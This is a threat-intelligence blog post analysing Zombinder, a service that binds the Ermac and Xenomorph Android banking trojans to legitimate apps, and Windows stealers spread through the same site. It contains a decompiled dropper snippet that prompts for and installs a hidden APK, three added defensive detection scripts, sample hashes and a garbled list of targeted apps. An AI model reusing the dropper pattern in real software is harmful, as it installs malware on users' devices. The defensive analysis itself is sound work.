
Zombinder: new obfuscation service used by Ermac, now distributed next to desktop stealers

08 December 2022

Targeting different platforms and introducing Zombinder

The threat landscape has seen several cases of threat actors using Trojans that target different platforms and systems. This time, while analyzing the activity of the Android banking Trojan Ermac, ThreatFabric’s analysts discovered a campaign employing several Trojans and targeting both Android and Windows users at the same time, in order to reach as many victims as possible. Besides the Ermac Android banking Trojan, the campaign involved desktop malware in the form of Erbium, Aurora stealer, and Laplas “clipper”.

This campaign resulted in thousands of victims; the Erbium stealer, for example, successfully exfiltrated data from more than 1300 victims.

In this blog we also highlight a third-party service on the darknet, which we dubbed Zombinder. It is used to bind a malicious payload to a legitimate Android application in order to trick victims into installing it.

Everyone needs Wi-Fi

While investigating Ermac’s activity, our researchers spotted an interesting campaign masquerading as applications for Wi-Fi authorization. It was distributed through a fake one-page website containing only two buttons.


As you might have already guessed, the “Download for Android” button leads to downloading samples of Ermac. We classify this variant as Ermac.C. It has the following capabilities, among others that were previously widely reported:

  • Overlay attack to steal PII
  • Keylogging
  • Stealing e-mails from Gmail application
  • Stealing 2FA codes
  • Stealing seed phrases from several cryptocurrency wallets

It is worth mentioning that the original actor, DukeEugene, announced that a new version of Ermac (“Ermac 3”) containing new features is coming soon, but it is still in development at the time of writing this blog.

During the monitoring of the abovementioned campaign, we observed several approaches and lures used by the actor. It started with a Wi-Fi authorization app, which was in fact Ermac with its malicious code obfuscated. Shortly afterwards, our monitoring systems spotted several updates of the payload: at this stage it was masquerading as a browser update. However, another detail drew our attention: some of the downloaded apps were not Ermac itself, but a “legitimate” app that, during its normal operation, installed Ermac as a payload targeting multiple banking applications, which can be found in the Appendix.

Such apps were disguised as modified versions of Instagram, WiFi Auto Authenticator, Football Live Streaming, etc. The package names were also the same as those of the legitimate applications.

In fact, the actor used a third-party service provided on the darknet to “glue”, or bind, dropper capabilities to a legitimate application. After being downloaded, the bound application acts as usual until it shows a message stating that the app needs to be updated. At this point, if the victim accepts, the seemingly legitimate application installs this update, which is nothing other than Ermac. The whole process, from installing the application to Ermac running on the device, can be seen in the following picture.


This process is achieved by “gluing” an obfuscated malicious payload to a legitimate app, with minor updates made to the original source code to include installation and loading of the malicious payload. We called this dropper “Zombinder”, as it takes the original application and binds malicious code to it, making it a “zombie” that installs the desired payload. The following snippet provides an example of the code added to install and launch the payload.

AlertDialog.Builder alertDialog$Builder0 = new AlertDialog.Builder(this);
alertDialog$Builder0.setMessage("This app requires the plugin app to be installed. Please, confirm the installation by the following steps: press Settings -> enable the toggle button -> press Install");
alertDialog$Builder0.setPositiveButton("OK", () -> {
    new Handler().postDelayed(new Runnable() {
        public void run() {
            OverlayActivity.this.isInstalled = OverlayActivity.this.isAppInstalled(;
    }, 3000L);
    if (!OverlayActivity.this.isInstalled) {
        try {
            File file0 = OverlayActivity.this.getApplicationContext().getExternalFilesDir(Environment.DIRECTORY_DOCUMENTS);
            File file1 = new File(file0, "app.apk");
            StringBuilder stringBuilder0 = new StringBuilder();
            String s = File.separator;
            if (file1.exists()) {
                Intent intent0 = new Intent("android.intent.action.INSTALL_PACKAGE");
                intent0.setDataAndType(FileProvider.getUriForFile(OverlayActivity.this, "com.og.appran.pan.fileprovider", file1), "application/");
                OverlayActivity.this.startActivity(Intent.createChooser(intent0, ""));
        } catch (IOException unused_ex) {}
        OverlayActivity.this.startService(new Intent(OverlayActivity.this, LuckyService.class));
    try {
        Intent intent1 = OverlayActivity.this.getPackageManager().getLaunchIntentForPackage("com.fuyocelasisi.woyopu");
        if (intent1 != null) {
    } catch (Exception unused_ex) {}
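
A static triage check built from the traits visible in the snippet above, added here as an example and not ThreatFabric's tooling: it looks for the install prompt, the local APK, the INSTALL_PACKAGE intent and the launch of another package in decompiled source, and compares the signing certificate with a defender-kept inventory, since bound apps keep the legitimate package name but cannot keep the original signer. The `KNOWN_SIGNERS` inventory, both sample sources and every `com.example.*` name are constructed placeholders.

```python
import re
from dataclasses import dataclass

# One regex per step of the drop sequence visible in the decompiled snippet.
TRAITS = {
    "install_prompt": re.compile(r'setMessage\s*\(\s*"[^"]*\binstall', re.I),
    "apk_in_app_storage": re.compile(r'new\s+File\s*\([^;]*?"[^"]+\.apk"\s*\)'),
    "install_intent": re.compile(r'"android\.intent\.action\.INSTALL_PACKAGE"'),
    "fileprovider_uri": re.compile(r'FileProvider\.getUriForFile\s*\('),
}
LAUNCH_RE = re.compile(r'getLaunchIntentForPackage\s*\(\s*"([\w.]+)"\s*\)')


@dataclass
class Report:
    package: str
    traits: list           # names of the TRAITS regexes that matched
    launches: list         # other packages this app tries to start
    signer_mismatch: bool  # package is in the inventory but signed by someone else
    verdict: str


def triage(package, signer_sha256, source, known_signers):
    """Score one decompiled APK. known_signers maps a package name to the
    SHA-256 of its expected signing certificate (hypothetical inventory)."""
    traits = [name for name, rx in TRAITS.items() if rx.search(source)]
    launches = sorted({p for p in LAUNCH_RE.findall(source) if p != package})
    expected = known_signers.get(package)
    mismatch = expected is not None and expected.lower() != signer_sha256.lower()

    # Core behaviour: an APK kept in app storage is handed to the installer.
    drops_apk = {"apk_in_app_storage", "install_intent"} <= set(traits)
    if drops_apk and (launches or mismatch):
        verdict = "likely bound dropper"
    elif drops_apk or mismatch:
        verdict = "needs review"
    else:
        verdict = "no dropper traits"
    return Report(package, traits, launches, mismatch, verdict)


# Constructed inputs: placeholder digests and sources modelled on the snippet.
KNOWN_SIGNERS = {"com.example.player": "aa" * 32}

BOUND_SRC = '''
b.setMessage("This app requires the plugin app to be installed.");
File f = new File(getExternalFilesDir(Environment.DIRECTORY_DOCUMENTS), "app.apk");
Intent i = new Intent("android.intent.action.INSTALL_PACKAGE");
i.setDataAndType(FileProvider.getUriForFile(this, "com.example.player.fileprovider", f), type);
Intent launch = getPackageManager().getLaunchIntentForPackage("com.example.payload");
'''

BENIGN_SRC = '''
b.setMessage("Install the maps app from the store to see directions.");
Intent maps = getPackageManager().getLaunchIntentForPackage("com.example.maps");
'''

if __name__ == "__main__":
    for pkg, signer, src in [
        ("com.example.player", "bb" * 32, BOUND_SRC),
        ("com.example.notes", "cc" * 32, BENIGN_SRC),
    ]:
        print(triage(pkg, signer, src, KNOWN_SIGNERS))
```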

The binding service is provided by an actor well known in the threat landscape, and is an addition to a major project: an obfuscation tool that is used by multiple actors on the Android criminal scene. The binding service itself was announced in March 2022 and now seems to be used frequently by different actors.


We have observed several “zombie” applications used to distribute mobile malware (e.g. Ermac, Sova).


The latest campaign involving Zombinder that we identified while writing this blog was distributing the Xenomorph banking Trojan under the guise of the VidMate application. Just like in the abovementioned campaign, a modified legitimate application was downloaded from a malicious website mimicking the original website of the application. The victim is directed there through a malicious advertisement.


As a result, Zombinder drops and launches the Xenomorph Trojan while the original app remains fully operational, so the victim remains unsuspecting. It is worth noting that the authors of Xenomorph (known as HadokenSecurity) continue developing the Trojan. Its latest versions are enhanced with keylogging functionality, an accessibility actions engine, and a SOCKS proxy feature.


This Xenomorph campaign targets banking customers from Spain, Portugal, and Canada; the full target list can be found in the Appendix.

Multiple Windows threats

However, this campaign has another unique characteristic that we had not observed before and that attracted our attention: the presence of a “Download for Windows” button on the malicious website distributing Ermac. It is common on the mobile threat landscape to utilize multiple Trojans targeting different platforms in one distribution campaign. In this specific case, the actor seems to target the Android and Windows platforms in order to expand his/her reach as much as possible. But it is also possible that this is the same landing page shared by different actors distributing Android and Windows Trojans. Nevertheless, our team dived into the desktop malware that was distributed along with Ermac.

Erbium Stealer

During our investigation we observed several desktop Trojans connected with this campaign. When we first discovered it, an encrypted archive was being distributed, with the password contained in the name of the downloaded file. This is a common technique used by threat actors to avoid detection of the original downloaded file by antivirus engines. This archive contained samples of Erbium stealer, a Windows Trojan quite popular amongst cyber-criminals, which is able to steal (among other data) saved passwords, credit card details, cookies from various browsers, and “cold” (offline) cryptocurrency wallet data from both desktop applications and browser extensions. The stealer is advertised on cyber-criminals’ forums and on a Telegram channel.


Our analysts were able to identify more than 1300 victims of this Erbium stealer campaign, which is highly likely operated by the same actor behind the above-described Ermac campaign.

Laplas Clipper

Not being satisfied, the actor went further: upon launch of Erbium, another Trojan, Laplas “clipper”, was downloaded and installed on the same infected device. Laplas is a relatively new product on darknet markets, and provides its operators with the ability to substitute a cryptocurrency wallet address copied by the victim with one controlled by the actor. In such cases, the unsuspecting victim copies the address that belongs to the intended recipient of the transfer, but the pasted address is substituted with a different one that looks similar to the original. As a result, the transfer is made to another wallet, owned by the threat actor, while the victim will hardly notice the difference.


Laplas presents itself as a “unique” clipper that is able to generate similar wallet addresses that have the same symbols at the beginning or at the end. Its authors seem to continue updating their Trojan and recently released an update to its panel. The authors of Laplas also highlight that their product can be distributed together with stealers, as most of them have the ability to download and launch executables.
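
Because the substituted address shares its first or last symbols with the real one, checking only the ends of a pasted address does not catch the swap. This added example (not from the original post) compares the copied and pasted addresses in full and scans a clipboard history for an address replaced by another of the same kind; the address patterns, the `min_affix` and `window` thresholds and all sample values are constructed assumptions.

```python
import re

# Common public address shapes: Bitcoin legacy, Bitcoin bech32, Ethereum-style hex.
ADDRESS_SHAPES = {
    "btc-legacy": re.compile(r"[13][a-km-zA-HJ-NP-Z1-9]{25,34}"),
    "btc-bech32": re.compile(r"bc1[ac-hj-np-z02-9]{11,71}"),
    "eth-hex": re.compile(r"0x[0-9a-fA-F]{40}"),
}
# Leading characters that every address of a kind shares; ignored when comparing.
SCHEME_TAG_LEN = {"btc-legacy": 1, "btc-bech32": 3, "eth-hex": 2}


def address_kind(text):
    """Return the address kind of a clipboard string, or None if it is not one."""
    text = text.strip()
    for kind, rx in ADDRESS_SHAPES.items():
        if rx.fullmatch(text):
            return kind
    return None


def shared_affixes(a, b):
    """Lengths of the common prefix and common suffix of two strings."""
    limit = min(len(a), len(b))
    prefix = 0
    while prefix < limit and a[prefix] == b[prefix]:
        prefix += 1
    suffix = 0
    while suffix < limit - prefix and a[-1 - suffix] == b[-1 - suffix]:
        suffix += 1
    return prefix, suffix


def classify_swap(copied, pasted, min_affix=3):
    """Compare what the user copied with what is about to be pasted."""
    copied, pasted = copied.strip(), pasted.strip()
    kind = address_kind(copied)
    if kind is None or kind != address_kind(pasted):
        return "not-comparable"
    if copied == pasted:
        return "match"
    tag = SCHEME_TAG_LEN[kind]
    prefix, suffix = shared_affixes(copied[tag:], pasted[tag:])
    return "lookalike" if max(prefix, suffix) >= min_affix else "different"


def find_swaps(events, window=2.0):
    """events: time-ordered (seconds, clipboard_text) observations. Flags an
    address replaced by a different address of the same kind within `window`
    seconds, faster than a user would re-copy by hand (assumed threshold)."""
    alerts = []
    for (t0, old), (t1, new) in zip(events, events[1:]):
        verdict = classify_swap(old, new)
        if verdict in ("lookalike", "different") and t1 - t0 <= window:
            alerts.append((t1, verdict, old, new))
    return alerts


# Constructed values: not real wallets.
COPIED = "0x1111aaaa2222bbbb3333cccc4444dddd5555eeee"
LOOKALIKE = "0x1111aaaa9999ffff0000777788886666abcdeeee"
UNRELATED = "0x9999000088887777666655554444333322221111"
EVENTS = [(10.0, "meeting notes"), (42.0, COPIED), (42.3, LOOKALIKE), (90.0, UNRELATED)]

if __name__ == "__main__":
    for alert in find_swaps(EVENTS):
        print(alert)
```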

However, this is not the end of the story.

Aurora Stealer

While we were working on this blog, our systems spotted another Windows Trojan that was distributed through the same malicious website. This time it was another Windows Trojan stealer known as Aurora. The notable thing about this particular build is its size: more than 300 MB. This is probably a tactic to overcome detection by antivirus engines, as most of the data is just an “overlay” filled with zero bytes. At the same time the actual payload is encrypted and unpacked during the execution of the application.
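
The padding described above can be measured directly. This added example (not ThreatFabric's tooling) parses the PE section table, treats everything after the last section's raw data as overlay, and reports the overlay's share of the file and its share of zero bytes; the 0.9 thresholds and the tiny PE produced by `build_constructed_pe` are assumptions for illustration.

```python
import struct


def overlay_profile(data, min_overlay_share=0.9, min_zero_share=0.9):
    """Measure the overlay of a PE file held in `data` (bytes)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)  # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # COFF header: Machine, NumberOfSections, three uint32 fields,
    # SizeOfOptionalHeader, Characteristics.
    _, n_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    table = pe_off + 24 + opt_size
    end_of_image = table + 40 * n_sections
    for i in range(n_sections):
        # SizeOfRawData and PointerToRawData sit at offset 16 of each 40-byte entry.
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        if raw_size:
            end_of_image = max(end_of_image, raw_ptr + raw_size)
    end_of_image = min(end_of_image, len(data))

    overlay_size = len(data) - end_of_image
    zeros = data.count(0, end_of_image)  # count in place, no copy of the overlay
    overlay_share = overlay_size / len(data)
    zero_share = zeros / overlay_size if overlay_size else 0.0
    # A small overlay is normal (installers and signatures append data after the
    # sections); the signal is an overlay that dominates the file and is all zeros.
    inflated = overlay_share >= min_overlay_share and zero_share >= min_zero_share
    return {
        "overlay_offset": end_of_image,
        "overlay_size": overlay_size,
        "overlay_share": overlay_share,
        "zero_share": zero_share,
        "inflated": inflated,
    }


def build_constructed_pe(overlay):
    """Constructed test input: a minimal PE header, one 16-byte section, then overlay."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)            # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 0, 0x22)  # one section
    section = struct.pack("<8sIIIIIIHHI", b".text", 16, 0x1000, 16, 128,
                          0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\0\0" + coff + section                   # 128 bytes
    return headers + b"\x90" * 16 + overlay


if __name__ == "__main__":
    print(overlay_profile(build_constructed_pe(b"\0" * 100_000)))
    print(overlay_profile(build_constructed_pe(b"setup-data" * 8)))
```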

Aurora is a Golang stealer that has recently started gaining traction on underground forums.


The presence of such a wide variety of Trojans might also indicate that the malicious landing page is used by multiple actors and provided to them as part of a third-party distribution service. However, we cannot


The modern threat landscape is becoming more and more sophisticated: actors combine multiple approaches in malware development, distribution, and operation, as well as in performing the fraud itself, employing multiple tactics at the same time. New tools appear that make malware less suspicious or more trustworthy to the victim, which results in more successful fraud cases. Moreover, by targeting multiple platforms, actors are able to reach a wider “audience” and steal more PII to use in further fraud.

Continuous monitoring of the mobile threat landscape and tracking of different actors and campaigns make it possible not only to identify mobile threats but also to draw connections to desktop actors and campaigns. Besides, such monitoring paints a picture of a modern threat landscape in which more and more activities are outsourced and new actors appear providing distribution, obfuscation, and malware development services, while already known actors extend their “portfolio”. The Threat Intelligence collected makes it possible to build effective and proactive solutions to identify new threats and combat them.

Financial organizations are welcome to contact us: if you suspect that an app is involved in malicious activity, feel free to reach out to our Mobile Threat Intelligence team, which will provide additional details and help with reporting the malicious app if identified:



Zombinder Samples

| App name | Package name | SHA-256 |
| --- | --- | --- |
| WiFi Auto Authenticator | com.woosh.wifiautoauth | e633cb7abcf94bc9cb1db637d262739b8458ba9b183ea2166c2537aeb57aa1f7 |
| Football live stream | com.aufait.footballlivestream | dc3e51cffb3b05eec4b9249fb5e52b5530faf8db9b8c15474561ebc59ec172e4 |
| OG | com.much.dizzy | f43813c43174826f26490230ee43e354c7be2f85dd7d096064a017c3ce6cfa41 |

Ermac Samples

| App name | Package name | SHA-256 |
| --- | --- | --- |
| Wi Fi Authorization | com.welomuxitononu.voretije | 97cbc137f8c045cd6a6b7d828b5b97b50279c2901cc67eec121d2c6df2f576be |
| Live Football Stream 1.9 | com.busafobawori.zuvo | 9ed8f39b22b997cb0d2ee8e55336972e1a9feeb222da3c4c23ed6566f29d5a92 |
| OGInsta+ Mod | com.fuyocelasisi.woyopu | fd477e257d2d68dd43d1490555ac800ab61febf51d07f18d0ed4568f116952b2 |

Xenomorph Sample

| App name | Package name | SHA-256 |
| --- | --- | --- |
| VidMate | com.focus.equip | 8a7309366917e05c348caf79d4f29f60878958baff794f07c12f08dadcb186fa |

Erbium Stealer Sample


Laplas Clipper Sample


Aurora Stealer Sample


Ermac Targets

Package name App name SC Mobile Banking (UAE)  
com.snapwork.IDBI IDBI Bank GO Mobile+  
com.Plus500 Plus500: CFD Online Trading on Forex and Stocks  
com.ingbanktr.ingmobil ING Mobil PayPal Mobile Cash: Send and Request Money Fast TSB Mobile Banking Metro Bank  
pt.cgd.caderneta Caderneta BNL Google Play  
com.airbitz Bitcoin Wallet - Airbitz Bitcoin Wallet - Buy BTC Netflix  
gr.winbank.mobilenext Winbank Mobile norisbank App  
com.tarjetanaranja.emisor.serviciosClientes.appTitulares Naranja Caixadirecta Banque pour tablettes Android Triodos Bank. Banca Móvil  
pl.millennium.corpApp Bank Millennium for Companies imo free video calls and chat C.PAY Itaú Empresas: Controle e Gestão do seu Negócio  
com.exmo EXMO Official - Trading crypto on the exchange  
com.bitfinex.mobileapp Bitfinex  
com.teb CEPTETEB N26 — The Mobile Bank  
pt.bctt.appbctt Banco CTT ANZ Shield  
com.mercadolibre Mercado Libre: compra fácil y rápido  
de.santander.presentation Santander Banking HSBC Canada  
com.aadhk.woinvoice Invoice Maker: Estimate & Invoice App  
pl.fakturownia BankSA Mobile Banking HSBCnet Mobile  
pl.pkobp.ipkobiznes iPKO biznes HSBC México  
com.appfactory.tmb Teachers Mutual Bank ADCB  
es.caixageral.caixageralapp Banco Caixa Geral España  
de.ingdiba.bankingapp ING Banking to go  
es.caixagalicia.activamovil ABANCA- Banca Móvil  
cz.csob.smartbanking ČSOB Smartbanking Edge - Bitcoin, Ethereum, Monero, Ripple Wallet ING Italia Bi en Línea Pro: Advanced Bitcoin & Crypto Trading CBD iBOSStoken  
com.eofinance EO.Finance: Buy and Sell Bitcoin. Crypto Wallet  
com.infrasofttech.CentralBank Cent Mobile  
com.EurobankEFG Eurobank Mobile App  
com.azimo.sendmoney Azimo Money Transfer SecureApp netbank  
it.creval.bancaperta Bancaperta  
at.spardat.bcrmobile Touch 24 Banking BCR Barclays  
com.db.pbc.DBPay DB Pay Itaú Uruguay  
com.paxful.wallet Paxful Bitcoin Wallet ePayments: wallet & bank card Burgan Bank  
ar.macro Macro  
com.unocoin.unocoinwallet Unocoin Wallet CitiManager – Corporate Cards  
eu.inmite.prj.kb.mobilbank Mobilni Banka  
com.lynxspa.bancopopolare YouApp  
hu.cardinal.cib.mobilapp CIB Business Online  
com.abanca.bancaempresas ABANCA Empresas ING Australia Banking – Germany‘s largest car market  
com.albarakaapp Albaraka Mobile Banking Interbank APP Macquarie Mobile Banking  
com.mobileloft.alpha.droid myAlpha Mobile  
com.targoes_prod.bad TARGOBANK - Banca a distancia  
com.tecnocom.cajalaboral Banca Móvil Laboral Kutxa My AMP  
com.bitmarket.trader Aplikacja Bitmarket  
eu.netinfo.colpatria.system Scotiabank Colpatria  
com.BOQSecure BOQ Secure Bitcoin Wallet Coincheck Indodax  
com.botw.mobilebanking Bank of the West Mobile  
com.sella.BancaSella Banca Sella Fibabanka Corporate Mobile  
es.pibank.customers Pibank WeChat  
es.univia.unicajamovil UnicajaMovil BBVA Net Cash ES & PT AOL - News, Mail & Video  
ma.gbp.pocketbank Pocket Bank ING Business  
com.getingroup.mobilebanking Getin Mobile  
com.garanti.cepsubesi Garanti BBVA Mobile HSBC UK Mobile Banking  
com.kasikorn.retail.mbanking.wap K PLUS  
io.ethos.universalwallet Ethos Universal Wallet Chase Mobile BBVA Spain - Buy Bitcoin Now Bancolombia App Personas  
com.barclaycardus Barclays US eBay: Buy, sell, and save money on home essentials Wells Fargo Mobile NatWest Mobile Banking Twitter Lite CEX.IO Cryptocurrency Exchange  
com.bankinter.launcher Bankinter Móvil  
pl.eurobank2 eurobank mobile 2.0 Usługi Bankowe  
com.db.pbc.mibanco Mi Banco db  
com.rak RAKBANK Digital Banking  
com.bankofqueensland.boq BOQ Mobile Simplii Financial ŞEKER MOBİL ŞUBE  
com.bitpay.wallet BitPay – Secure Bitcoin Wallet Connect for Hotmail & Outlook: Mail and Calendar HSBC France  
com.bancodebogota.bancamovil Banco de Bogotá  
com.att.myWireless myAT&T  
com.unicredit Mobile Banking UniCredit  
com.btcturk BtcTurk Bitcoin Borsası Amazon Seller  
pl.allegro Allegro - convenient and secure online shopping  
cl.bancochile.mbanking Mi Banco de Chile  
com.bankinter.bkwallet Bankinter Wallet  
com.santander.bpi Santander Private Banking  
softax.pekao.powerpay PeoPay  
com.vancity.mobileapp Vancity Mój Orange  
com.ubercab Uber - Request a ride Western Union ES - Send Money Transfers Quickly  
com.denizbank.mobildeniz MobilDeniz  
com.CredemMobile Credem Kotak - 811 & Mobile Banking ActivoBank Banco Sabadell App. Your mobile bank  
com.vipera.ts.starter.MashreqAE Mashreq UAE Navy Federal Credit Union  
com.samba.mb SambaMobile  
com.aff.otpdirekt OTP SmartBank  
com.mobikwik_new BHIM UPI, Money Transfer, Recharge & Bill Payment  
enbd.mobilebanking Emirates NBD  
com.mtel.androidbea BEA 東亞銀行  
pl.aliorbank.aib Alior Mobile CommBank  
it.carige Carige Mobile Coinbase – Buy & Sell Bitcoin. Crypto Wallet Yono Lite SBI - Mobile Banking ABANCA - Portugal Gmail SBI Anywhere Corporate  
com.fusion.beyondbank Beyond Bank Australia  
cc.bitbank.bitbank bitbank - Bitcoin & Ripple Wallet  
pt.novobanco.nbapp NB smart app  
com.engage.pbb.pbengage2my.release PB engage MY The Co-operative Bank Barclays Kenya  
com.infosys.alh Al Hilal Mobile Banking App ASB Mobile Banking Openbank – banca móvil ANZ Transactive - Global CIBC Mobile Banking®  
com.dhanlaxmi.dhansmart.mtc Dhanlaxmi Bank Mobile Banking  
com.Version1 PNB ONE BROU Llave Digital  
es.ibercaja.ibercajaapp Ibercaja SNB AlAhli Mobile Binance - Buy & Sell Bitcoin Securely  
com.ideomobile.hapoalim בנק הפועלים - ניהול החשבון‎ imaginBank - Your mobile bank  
com.alrajhiretailapp Al Rajhi Mobile Mes Comptes - LCL  
com.grupoavaloc1.bancamovil Banco de Occidente Móvil  
at.volksbank.volksbankmobile Volksbank hausbanking  
pl.ideabank.mobilebanking Idea Bank PL  
com.exictos.mbanka.bic Banco BIC, SA QNB Finansbank Mobile Banking  
hu.mkb.mobilapp MKB Mobilalkalmazás  
com.zellepay.zelle Zelle George Magyarország TransferWise Money Transfer Nexi Pay  
com.todo1.davivienda.mobileapp Davivienda Móvil  
com.s4m EI Bank 三井住友銀行アプリ  
com.rsi.Colonya Colonya Caixa Pollença  
finansbank.enpara Cep Şubesi Sparkasse Ihre mobile Filiale Hype Krungthai NEXT Yahoo Mail – Organized Email  
com.nearform.ptsb permanent tsb  
es.evobanco.bancamovil EVO Banco móvil BOCHK Report HDFC Bank MobileBanking ANZ Australia Bank of Scotland Mobile Banking: secure on the go  
com.bancomer.mbanking BBVA México (Bancomer Móvil) Banca MPS  
eu.eleader.mobilebanking.nbk NBK Mobile Banking  
www.ingdirect.nativeframe ING España. Banca Móvil WiZink, tu banco senZillo BBVA Perú Zip - Shop Now, Pay Later KeyBank Mobile PNC Mobile Banca Móvil BCP  
com.fusion.banking Bank Australia app SCB EASY  
com.mycelium.wallet Mycelium Bitcoin Wallet  
exodusmovement.exodus Exodus: Crypto Bitcoin Wallet  
com.leumi.leumiwallet לאומי‎ mail  
com.zoluxiones.officebanking Banco Santander Perú S.A.  
uy.brou App Móvil del Banco República Halifax: the banking app that gives you extra Cajasur Millenniumbcp Paribu HSBC Malaysia YouTube BBVA Empresas México Pro & Entreprises LCL AXA Banque France TD Canada Bankia Fortuneo, mes comptes banque & bourse en ligne Bank of Melbourne Business App Bank Austria MobileBanking  
com.tronlinkpro.wallet TronLink Pro - The Best TRON Wallet  
com.isis_papyrus.raiffeisen_pay_eyewdg Raiffeisen ELBA Lloyds Bank Mobile Banking: by your side  
es.bancosantander.apps Santander CaixaBank  
com.latuabancaperandroid Intesa Sanpaolo Mobile  
ar.bapro BIP Mobile Santander Argentina NPBS Mobile Banking  
fr.bnpp.digitalbanking Hello bank! par BNP Paribas Moje ING mobile Instagram Macquarie Authenticator People’s United Bank Mobile  
com.pttfinans PTTBank Desjardins mobile services  
com.woodforest Woodforest Mobile Banking  
pl.bzwbk.bzwbk24 Santander mobile  
com.konylabs.cbplpat Citi Handlowy Rossmann PL Payoneer – Global Payments Platform for Businesses VakıfBank Mobil Bankacılık  
org.westpac.col Westpac Corporate Mobile Banca Transilvania National Bank of Canada  
com.cm_prod.bad Crédit Mutuel  
it.bcc.iccrea.mycartabcc myCartaBCC Kutxabank  
pro.huobi Huobi Global  
pl.nestbank.nestbank Nest Bank nowy HSBC Turkey  
es.caixaontinyent.caixaontinyentapp Caixa Ontinyent  
com.magiclick.odeabank Odeabank  
com.krungsri.kma KMA  
com.whatsapp WhatsApp Messenger  
com.moneybookers.skrillpayments.neteller NETELLER - fast, secure and global money transfers  
eu.eleader.mobilebanking.invest plusbank24 Union Bank Mobile Banking Maybank2u MY  
de.consorsbank Consorsbank  
it.relaxbanking RelaxBanking Mobile  
com.pozitron.iscep İşCep - Mobile Banking  
com.cic_prod.bad CIC Royal Bank of Scotland Mobile Banking  
coop.bancocredicoop.bancamobile Credicoop Móvil NBapp Spain Bendigo Bank DIB MOBILE  
it.phoenixspa.inbank Inbank Banque La Banque Postale  
com.suntrust.mobilebanking SunTrust Mobile App  
eu.unicreditgroup.hvbapptan HVB Mobile Banking  
com.ocito.cdn.activity.creditdunord Crédit du Nord pour Mobile  
com.tideplatform.banking Tide - Smart Mobile Banking  
de.dkb.portalapp DKB-Banking  
it.nogood.container UBI Banca  
com.bitcoin.mwallet Bitcoin Wallet  
com.cimbmalaysia CIMB Clicks Malaysia imo beta free calls and text Bank of America Mobile Banking  
com.clairmail.fth Fifth Third Mobile Banking Tangerine Mobile Banking  
posteitaliane.posteapp.appbpol BancoPosta PC Financial Mobile  
mx.bancosantander.supermovil Santander móvil  
com.htsu.hsbcpersonalbanking HSBC Mobile Banking Amazon Shopping - Search, Find, Ship, and Save  
org.toshi Coinbase Wallet — Crypto Wallet & DApp Browser  
com.cbq.CBMobile CBQ Mobile  
com.samourai.wallet Samourai Wallet  
pt.cgd.caixadirectaempresas Caixadirecta Empresas Cash App  
com.empik.empikapp Empik  
eu.eleader.mobilebanking.pekao.firm PekaoBiznes24 myRAMS CA24 Mobile  
pl.pkobp.iko IKO MBNA - Card Services App  
it.popso.SCRIGNOapp SCRIGNOapp Mobile BiznesPl@net Tesco Mobile  
pl.mbank mBank PL  
es.cecabank.ealia2103appstore UniPay Unicaja Santander Money Plan  
com.kubi.kucoin KuCoin: Bitcoin Exchange & Crypto Wallet  
com.bancocajasocial.geolocation Banco Caja Social Móvil Capital One® Mobile  
net.garagecoders.e_llavescotiainfo ScotiaMóvil 住信SBIネット銀行 CUA Mobile Banking Amex BRED  
com.grupocajamar.wefferent Grupo Cajamar  
com.citibanamex.banamexmobile Citibanamex Móvil  
com.mcom.firstcitizens First Citizens Mobile Banking  
com.bancsabadell.wallet Sabadell Wallet  
com.whatsapp.w4b WhatsApp Business  
com.citizensbank.androidapp Citizens Bank Mobile Banking  
com.usbank.mobilebanking U.S. Bank - Inspired by customers St.George Mobile Banking  
fr.banquepopulaire.cyberplus Banque Populaire  
com.rsi ruralvía  
com.tmobtech.halkbank Halkbank Mobil  
es.bancosantander.empresas Santander Empresas BPI APP Bittrex Global Twitter Bankwest  
de.traktorpool tractorpool  
es.ceca.cajalnet Cajalnet  
org.banking.stg.businessconnect St.George Business App Bank of Melbourne Mobile Banking Bank Millennium  
eu.atlantico.bancoatlanticoapp MY ATLANTICO Mes Comptes BNP Paribas Best Bank  
com.ambank.ambankonline AmOnline  
com.bankinter.portugal.bmb Bankinter Portugal  
com.ziraat.ziraatmobil Ziraat Mobile  
com.scotiabank.banking Scotiabank Mobile Banking Boursorama Banque Akbank  
us.zoom.videomeetings ZOOM Cloud Meetings  
pl.ceneo Ceneo - zakupy i promocje Yapı Kredi Mobile CommBiz Suncorp Bank  
com.quoine.quoinex.light Liquid by Quoineライト版(リキッドバイコイン) -ビットコインなどの仮想通貨取引所 Budapest Bank Mobil App  
com.citibank.CitibankMY Citibank MY RBC Mobile BMO Mobile Banking  
com.bankinter.empresas Bankinter Empresas  
com.cbk.mobilebanking CBK Mobile  
com.oxigen.oxigenwallet Bill Payment & Recharge,Wallet  
com.tdbank TD Bank (US)  
com.db.pwcc.dbmobile Deutsche Bank Mobile  
com.kuveytturk.mobil Kuveyt Türk  
com.mobillium.papara Papara  
tsb.mobilebanking TSB Bank Mobile Banking  
ch.autoscout24.autoscout24 AutoScout24 Switzerland – Find your new car  
com.wallet.crypto.trustapp Trust: Crypto & Bitcoin Wallet  
com.advantage.RaiffeisenBank Raiffeisen Smart Mobile イオン銀行通帳アプリ かんたんログイン&残高・明細の確認  
com.konylabs.HongLeongConnect Hong Leong Connect Mobile Banking  
com.targo_prod.bad TARGOBANK Mobile Banking Link Celular Fibabanka Mobile  
com.payeer PAYEER  
pl.bph BusinessPro Lite  
es.santander.Criptocalculadora Criptocalculadora MB WAY BBVA Portugal Westpac Mobile Banking CA Mobile  
eu.eleader.mobilebanking.pekao Pekao24Makler  
com.CIMB.OctoPH CIMB Bank PH  
es.bancosantander.wallet Santander Wallet  
com.bitpanda.bitpanda Bitpanda - Buy Bitcoin in minutes imo HD-Free Video Calls and Chats comdirect mobile App BNP Paribas GOMobile CMSO ma banque : solde, virement & épargne 楽天銀行 -個人のお客様向けアプリ iMobile by ICICI Bank  
es.liberbank.cajasturapp Banca Digital Liberbank Caja de Ingenieros Banca MÓVIL  
com.IngDirectAndroid ING France Microsoft Outlook: Organize Your Email & Calendar  
pt.santandertotta.mobileempresas Santander Empresas UBank Mobile Banking Noble Mobile BMO Digital Banking  
